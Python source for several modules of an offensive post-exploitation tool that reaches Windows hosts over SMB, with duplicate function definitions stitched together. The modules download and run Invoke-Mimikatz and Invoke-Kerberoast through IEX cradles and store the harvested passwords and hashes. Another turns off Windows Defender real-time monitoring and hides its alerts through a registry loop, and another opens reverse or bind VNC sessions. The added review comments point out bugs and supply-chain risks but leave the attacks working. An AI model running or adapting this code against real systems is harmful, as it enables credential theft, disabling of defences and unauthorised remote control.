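    def run(self, target, args, smb_con, loggers, config_obj):
        """Execute Invoke-Mimikatz on the target and harvest the credentials it prints.

        The PowerShell script is pulled either from this host (``args.fileless``) or
        straight from the Empire GitHub repository, wrapped in an IEX cradle and run
        through ``code_execution``. The output is parsed with ``self.parse_mimikatz``
        into the credential database, echoed to the console and written to a file
        under ``args.workspace``.

        Args:
            target: host identifier; used in the output filename and passed to code_execution.
            args: CLI namespace. Reads fileless, timeout, force_ps32, no_obfs, debug, workspace.
                ``args.timeout`` is raised while the script runs and restored on exit so the
                bump does not accumulate across targets (the original never restored it).
            smb_con: live SMB connection; host, ip, os and db are read.
            loggers: logger mapping; only ``loggers['console']`` is used.
            config_obj: forwarded to code_execution untouched.

        Returns:
            None. Failures are reported through the console logger rather than raised.
        """
        logger = loggers['console']
        original_timeout = args.timeout
        tag = self.name.upper()
        logger.info([smb_con.host, smb_con.ip, tag, 'Attempting Invoke-Mimikatz'])
        try:
            # Define Script Source
            if args.fileless:
                # Served from this machine over plain HTTP; the target connects back to us.
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
                setattr(args, 'timeout', original_timeout + 60)
            else:
                # NOTE(review): unpinned 'master' URL — the target executes whatever is on
                # that branch at run time (supply-chain exposure) and needs egress to
                # GitHub. Prefer --fileless or a pinned, verified copy of the script.
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
                setattr(args, 'timeout', original_timeout + 25)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            # NOTE(review): COMMAND is spliced verbatim into a double-quoted PowerShell
            # string; an embedded '"' will break the command line. Operator-supplied value.
            cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            try:
                # Execute
                cmd = powershell.create_ps_command(launcher, logger, force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
                results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

                # Display Output
                if not results:
                    logger.fail([smb_con.host, smb_con.ip, tag, 'No output returned'])
                    return
                if args.debug:
                    for line in results.splitlines():
                        logger.debug([smb_con.host, smb_con.ip, tag, line])

                # Parse results and send creds to db
                db_updates = 0
                for cred in self.parse_mimikatz(results):
                    # cred layout as consumed here: (kind, domain, user, secret) — confirm
                    # against parse_mimikatz; a short tuple raises IndexError (handled below).
                    kind, domain, user, secret = cred[0], cred[1], cred[2], cred[3]
                    if kind == "hash":
                        smb_con.db.update_user(user, '', domain, secret)
                    elif kind == "plaintext":
                        smb_con.db.update_user(user, secret, domain, '')
                    else:
                        continue
                    # Secrets are echoed to the console here; treat terminal logs accordingly.
                    logger.success([smb_con.host, smb_con.ip, tag, "{}\\{}:{}".format(domain, user, secret)])
                    db_updates += 1
                logger.info([smb_con.host, smb_con.ip, tag, "{} credentials updated in database".format(db_updates)])

                # write results to file
                # Raw Mimikatz output (plaintext passwords / hashes) is persisted to disk here.
                file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
                tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
                tmp_logger.info(results)
                logger.info([smb_con.host, smb_con.ip, tag, "Output saved to: {}".format(file_name)])

            except IndexError:
                # Replaces the old str(e) == "list index out of range" comparison.
                logger.fail([smb_con.host, smb_con.ip, tag, "{} failed".format(self.name)])
            except Exception as e:
                logger.fail([smb_con.host, smb_con.ip, tag, str(e)])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
        finally:
            # Undo the timeout bump so it does not leak into later modules / targets.
            setattr(args, 'timeout', original_timeout)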
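    def run(self, target, args, smb_con, loggers, config_obj):

        '''
        Toggle Windows Defender real-time monitoring and the matching Security Center
        toast notifications on the target, then read the Defender setting back.

        Full credit for kill-defender goes to @awsmhacks, amazing work!
        This was implemented in his project over at: https://github.com/awsmhacks/CrackMapExtreme

        Additional Resources:
        https://www.tenforums.com/tutorials/105486-enable-disable-notifications-windows-security-windows-10-a.html

        Module arg ACTION must be 'enable' or 'disable' (case-insensitive); anything
        else is reported on the console and the host is left untouched.

        Args:
            target: host identifier passed through to code_execution.
            args: CLI namespace; reads force_ps32 and no_obfs.
            smb_con: live SMB connection; host, ip and os are read.
            loggers: logger mapping; only loggers['console'] is used.
            config_obj: forwarded to code_execution untouched.
        '''

        logger = loggers['console']
        tag = self.name.upper()
        logger.warning([smb_con.host, smb_con.ip, tag, "This module is still in testing and not opsec safe..."])

        # Map ACTION onto the two values written to the host: the notification
        # registry value name and the boolean handed to Set-MpPreference.
        wanted = self.args['ACTION']['Value'].lower()
        if wanted == 'disable':
            notify, action = "Enabled", "$true"
        elif wanted == 'enable':
            notify, action = "Disabled", "$false"
        else:
            logger.fail([smb_con.host, smb_con.ip, tag, "Invalid module arg, only {enable, disable} allowed"])
            return

        # cmd.exe one-liner: walks every hive currently loaded under HKU and writes the
        # toast value ('^' are cmd escapes, '%a' the FOR variable). Not PowerShell.
        kill_notify = """"FOR /F %a IN ('REG.EXE QUERY hku 2^>NUL ^| FIND ^"HKEY_USERS^"') DO REG.EXE add ^"%a\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.SystemToast.SecurityAndMaintenance^" /v ^"{}^" /d ^"0^" /t REG_DWORD /F" """.format(notify)
        kill_defender = 'Set-MpPreference -DisableRealtimeMonitoring {};'.format(action)
        kd_verify     = 'Get-MpPreference |select DisableRealtimeMonitoring'
        # Grace period before reading the setting back; the log message is derived from
        # it so the two can no longer drift apart (the old text said 5s, the sleep was 8s).
        settle_seconds = 8

        try:
            # Modify notifications (return value intentionally not inspected)
            code_execution(smb_con, args, target, loggers, config_obj, kill_notify, return_data=True)

            # Modify Defender. NOTE(review): needs local admin on the target and may be
            # refused if Tamper Protection is enforced — trust the verify step below,
            # not the absence of an error here.
            cmd = powershell.create_ps_command(kill_defender, logger, force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

            logger.info([smb_con.host, smb_con.ip, tag, 'Execution complete, Sleeping {} seconds for process shutdown...'.format(settle_seconds)])
            sleep(settle_seconds)

            # Verify
            logger.info([smb_con.host, smb_con.ip, tag, 'Verifying Defender status...'])
            cmd = powershell.create_ps_command(kd_verify, logger, force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            status = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
            if not status:
                # Previously an AttributeError on .splitlines() that only surfaced at debug level.
                logger.fail([smb_con.host, smb_con.ip, tag, 'No output returned from Get-MpPreference'])
                return
            for line in status.splitlines():
                logger.info([smb_con.host, smb_con.ip, tag, line])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))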
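    def run(self, target, args, smb_con, loggers, config_obj):
        """Run Invoke-Kerberoast on the target and save whatever it prints.

        The script is fetched from this host (``args.fileless``) or from the Empire
        GitHub repository, wrapped in an IEX cradle and executed via ``code_execution``.
        Each output line is echoed as a success and the full output is written to a
        file under ``args.workspace``.

        Args:
            target: host identifier; used in the output filename and passed to code_execution.
            args: CLI namespace. Reads fileless, timeout, force_ps32, no_obfs, workspace.
                ``args.timeout`` is raised while the script runs and restored on exit so
                the bump does not accumulate across targets.
            smb_con: live SMB connection; host, ip and os are read.
            loggers: logger mapping; only ``loggers['console']`` is used.
            config_obj: forwarded to code_execution untouched.

        Returns:
            None. Errors are logged at debug level and swallowed.
        """
        logger = loggers['console']
        original_timeout = args.timeout
        tag = self.name.upper()
        logger.info([smb_con.host, smb_con.ip, tag, 'Attempting Invoke-Kerberoast'])
        try:
            # Define Script Source
            if args.fileless:
                # Served from this machine over plain HTTP; the target connects back to us.
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(srv_addr)
                setattr(args, 'timeout', original_timeout + 30)
            else:
                # NOTE(review): unpinned 'master' URL — the target runs whatever is on that
                # branch at run time (supply-chain exposure) and needs egress to GitHub.
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
                setattr(args, 'timeout', original_timeout + 15)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            # NOTE(review): the cradle gets an empty command, unlike the Mimikatz/VNC
            # modules — confirm the script self-invokes, otherwise nothing is roasted.
            launcher = powershell.gen_ps_iex_cradle(script_location, '')

            # Execute
            cmd = powershell.create_ps_command(launcher,
                                               logger,
                                               force_ps32=args.force_ps32,
                                               no_obfs=args.no_obfs,
                                               server_os=smb_con.os)
            output = code_execution(smb_con,
                                    args,
                                    target,
                                    loggers,
                                    config_obj,
                                    cmd,
                                    return_data=True)

            # Display Output
            if not output:
                # Previously an AttributeError on .splitlines() only visible at debug level.
                logger.fail([smb_con.host, smb_con.ip, tag, 'No output returned'])
                return
            for line in output.splitlines():
                logger.success([smb_con.host, smb_con.ip, tag, line])

            # write results to file (TGS hashes land on disk here)
            file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
            tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
            tmp_logger.info(output)
            logger.info([smb_con.host, smb_con.ip, tag, "Output saved to: {}".format(file_name)])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
        finally:
            # Undo the timeout bump so it does not leak into later modules / targets.
            setattr(args, 'timeout', original_timeout)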
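    def run(self, target, args, smb_con, loggers, config_obj):
        """Launch Invoke-Vnc on the target in reverse or bind mode.

        Module args: CONTYPE ('reverse' or 'bind'), PORT, PASSWORD and, for reverse
        mode, IPADDRESS (defaults to this host's address when empty). An invalid
        CONTYPE is reported and the module returns; it no longer calls ``exit(1)``,
        which terminated the whole tool (SystemExit is not caught by ``except Exception``).

        Args:
            target: host identifier passed to code_execution.
            args: CLI namespace. Reads fileless, timeout, force_ps32, no_obfs.
                ``args.timeout`` is raised while the script runs and restored on exit.
            smb_con: live SMB connection; host, ip and os are read.
            loggers: logger mapping; only ``loggers['console']`` is used.
            config_obj: forwarded to code_execution untouched.

        Returns:
            None. Errors are logged at debug level and swallowed.
        """
        logger = loggers['console']
        original_timeout = args.timeout
        tag = self.name.upper()
        logger.info([smb_con.host, smb_con.ip, tag, 'Attempting Invoke-VNC'])
        try:
            # Define Script Source
            if args.fileless:
                # Served from this machine over plain HTTP; the target connects back to us.
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Vnc.ps1'.format(srv_addr)
                setattr(args, 'timeout', original_timeout + 30)
            else:
                # NOTE(review): unpinned 'master' URL — the target runs whatever is on that
                # branch at run time (supply-chain exposure) and needs egress to GitHub.
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1'
                setattr(args, 'timeout', original_timeout + 15)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            # NOTE(review): PASSWORD is passed on the PowerShell command line and so is
            # visible in process listings / script-block logs on the target.
            con_type = self.args['CONTYPE']['Value']
            if con_type == 'reverse':
                if not self.args['IPADDRESS']['Value']:
                    self.args['IPADDRESS']['Value'] = get_local_ip()
                cmd = """Invoke-Vnc -ConType reverse -IpAddress {} -Port {} -Password {}""".format(self.args['IPADDRESS']['Value'], self.args['PORT']['Value'], self.args['PASSWORD']['Value'])
            elif con_type == 'bind':
                cmd = """Invoke-Vnc -ConType bind -Port {} -Password {}""".format(self.args['PORT']['Value'], self.args['PASSWORD']['Value'])
            else:
                # A bad module arg must not tear the whole run down (was exit(1)).
                logger.fail([smb_con.host, smb_con.ip, tag, "Invalid CONTYPE"])
                return

            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            # Execute
            cmd = powershell.create_ps_command(launcher, logger, force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            output = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

            # Display Output (empty/None output takes the "no output" branch instead of raising)
            if output and not output.startswith('Code execution failed'):
                for line in output.splitlines():
                    logger.info([smb_con.host, smb_con.ip, tag, line])
            else:
                logger.info([smb_con.host, smb_con.ip, tag, "Command execute with no output"])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
        finally:
            # Undo the timeout bump so it does not leak into later modules / targets.
            setattr(args, 'timeout', original_timeout)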
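    def run(self, target, args, smb_con, loggers, config_obj):
        """Execute Invoke-Mimikatz on the target and push parsed credentials into the DB.

        Older variant of the module (uses ``obfs=`` rather than ``no_obfs=``). The
        script is fetched from this host (``args.fileless``) or from the Empire GitHub
        repository, wrapped in an IEX cradle and executed via ``code_execution``; every
        output line is echoed and ``self.parse_mimikatz`` feeds the credential database.

        Args:
            target: host identifier passed to code_execution.
            args: CLI namespace. Reads fileless, timeout, force_ps32, obfs.
                ``args.timeout`` is raised while the script runs and restored on exit so
                the bump does not accumulate across targets.
            smb_con: live SMB connection; host, ip, os and db are read.
            loggers: logger mapping; only ``loggers['console']`` is used.
            config_obj: forwarded to code_execution untouched.

        Returns:
            None. Errors are logged at debug level and swallowed.
        """
        logger = loggers['console']
        original_timeout = args.timeout
        tag = self.name.upper()
        try:
            # Get script:
            if args.fileless:
                # Served from this machine over plain HTTP; the target connects back to us.
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
            else:
                # NOTE(review): unpinned 'master' URL — the target runs whatever is on that
                # branch at run time (supply-chain exposure) and needs egress to GitHub.
                script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
            logger.debug('Fetching script from {}'.format(script_location))

            # Setup
            setattr(args, 'timeout', original_timeout + 10)       # Modify timeout to allow execution time
            # NOTE(review): COMMAND is spliced verbatim into a double-quoted PowerShell
            # string; an embedded '"' will break the command line. Operator-supplied value.
            cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
            launcher = powershell.gen_ps_iex_cradle(script_location, cmd)

            try:
                # Execute
                cmd = powershell.create_ps_command(launcher, logger, force_ps32=args.force_ps32, obfs=args.obfs, server_os=smb_con.os)
                logger.info([smb_con.host, smb_con.ip, tag, 'Attempting Invoke-Mimikatz'])
                output = code_execution(smb_con, args, target, loggers, config_obj, cmd=cmd, return_data=True)

                # Display Output (secrets are echoed to the console here)
                if not output:
                    # Previously an AttributeError on .splitlines() only visible at debug level.
                    logger.info([smb_con.host, smb_con.ip, tag, 'No output returned'])
                    return
                for line in output.splitlines():
                    logger.success([smb_con.host, smb_con.ip, tag, line])

                # Parse results and send creds to db
                # cred layout as consumed here: (kind, domain, user, secret) — confirm
                # against parse_mimikatz.
                db_updates = 0
                for cred in self.parse_mimikatz(output):
                    if cred[0] == "hash":
                        smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                        db_updates += 1
                    elif cred[0] == "plaintext":
                        smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                        db_updates += 1
                logger.success([smb_con.host, smb_con.ip, tag, "{} credentials updated in database".format(db_updates)])
            except Exception as e:
                logger.debug([smb_con.host, smb_con.ip, tag, str(e)])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
        finally:
            # Undo the timeout bump so it does not leak into later modules / targets.
            setattr(args, 'timeout', original_timeout)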
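def ps_execution(con, args, target, loggers, config_obj):
    """Run the raw PowerShell in ``args.ps_execute`` on ``con`` and echo its output.

    Args:
        con: live connection; host, ip and os are read.
        args: CLI namespace; reads ps_execute, force_ps32, no_obfs, exec_method.
        target: passed through to code_execution.
        loggers: logger mapping; only ``loggers['console']`` is used.
        config_obj: forwarded to code_execution untouched.

    Returns:
        None. Any exception is logged at debug level and swallowed so a multi-target
        loop is not interrupted.
    """
    console = loggers['console']
    try:
        cmd = powershell.create_ps_command(args.ps_execute,
                                           console,
                                           force_ps32=args.force_ps32,
                                           no_obfs=args.no_obfs,
                                           server_os=con.os)
        result = code_execution(con,
                                args,
                                target,
                                loggers,
                                config_obj,
                                cmd,
                                return_data=True)
        # code_execution may come back empty/None; say so rather than tripping an
        # AttributeError on .splitlines() that only surfaced at debug level.
        if not result:
            console.info([con.host, con.ip, args.exec_method.upper(), 'No output returned'])
            return
        for line in result.splitlines():
            console.info([con.host, con.ip, args.exec_method.upper(), line])
    except Exception as e:
        console.debug([con.host, con.ip, args.exec_method.upper(), str(e)])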
def ps_execution(con,args,target,loggers,config_obj):
    """Build a PowerShell launcher from ``args.ps_execute`` and run it on ``con``.

    Output is not collected (no ``return_data``). Any exception raised while building
    or executing the command is logged at debug level and swallowed.

    Args:
        con: live connection; host, ip and os are read.
        args: CLI namespace; reads ps_execute, force_ps32, obfs.
        target: passed through to code_execution.
        loggers: logger mapping; only ``loggers['console']`` is used.
        config_obj: forwarded to code_execution untouched.
    """
    console = loggers['console']
    try:
        launcher = powershell.create_ps_command(
            args.ps_execute,
            console,
            force_ps32=args.force_ps32,
            obfs=args.obfs,
            server_os=con.os,
        )
        code_execution(con, args, target, loggers, config_obj, cmd=launcher)
    except Exception as err:
        console.debug([con.host, con.ip, "PS1 Execute", str(err)])